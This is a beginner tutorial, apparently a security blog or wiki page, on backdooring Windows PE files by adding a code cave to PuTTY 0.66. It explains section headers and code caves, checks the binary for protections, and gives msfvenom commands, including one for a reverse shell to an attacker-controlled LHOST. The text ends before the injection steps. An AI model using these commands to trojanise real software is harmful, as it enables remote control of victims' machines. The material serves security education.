Backdooring PE Files

This is a complete beginners guide to backdooring PE files.

TL;DR

In this blog, we will discuss the Portable Executable (PE) backdooring technique by adding a code cave and poping calculator in PuTTY v0.66 via utilizing injected code cave, with help on section header injections.

List of Content:

  • Introduction

  • Identifying the vulnerable PE file

  • Generating Payload

  • Adding new PE Section Header

  • Adding Payload to new PE Section Header

  • Redirecting execution flow to attacker's payload

  • Redirecting execution flow back to programs's instruction.

Let's dive in.

Introduction

I will try to explain some important topics in simplest manner as below:

PE File

According to Wikipedia, Portable Executable (PE) format is a file format for executables, object code, DLLs and others used in 32-bit and 64-bit versions of Windows operating systems.

Section Header

It is also known as section table. Each row of the section table is, in effect, a section header. This table immediately follows the optional header, if any. This positioning is required because the file header does not contain a direct pointer to the section table. Instead, the location of the section table is determined by calculating the location of the first byte after the headers. Make sure to use the size of the optional header as specified in the file header.

Code Cave

A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code's script functions that have capacity for the injection of custom instructions. For example, if a script's memory allows for five bytes and only three bytes are used, then the remaining two bytes can be used to add additional code to the script without making significant changes.

Identifying the vulnerable PE file

First we will find if our application is vulnerable to PE injection and if any type of protection is being used or not. We can automate this process by using the following powershell script: PESecurity

#importing module

Import-Module .\Get-PESecurity.psm1

#executing script

Get-PESecurity -file VulnerableSoftware.exe

Note: For this write-up, I am going to use Putty. (Download Link: Putty 0.66)

So, lets verify if putty is using any type of protection to prevent PE injection:

As we can see that there's no Security is being used to protect the Injections. So let's just move to the next step.

Generating Payload

Firstly, we are about to generate proper payload using msfvenom. We will use EXITFUNC=none option in order to let the payload to proceed with code flow further, without invoking ExitThread.

Here's the proper msfvenom commands:

Payload #1: Pop-up Calculator

msfvenom -p windows/exec CMD=calc.exe -f hex

Payload #2: Gain a reverse shell

msfvenom  -p windows/shell_reverse_tcp LHOST=192.168.100.XXX LPORT=4444 -f hex EXITFUNC=none

Note: I will pop up the calculator to demonstrate the tutorial little easier.

PreviousT1038: DLL Hijacking / InjectionNextCWE-316: Sensitive Information Stored in Memory

Last updated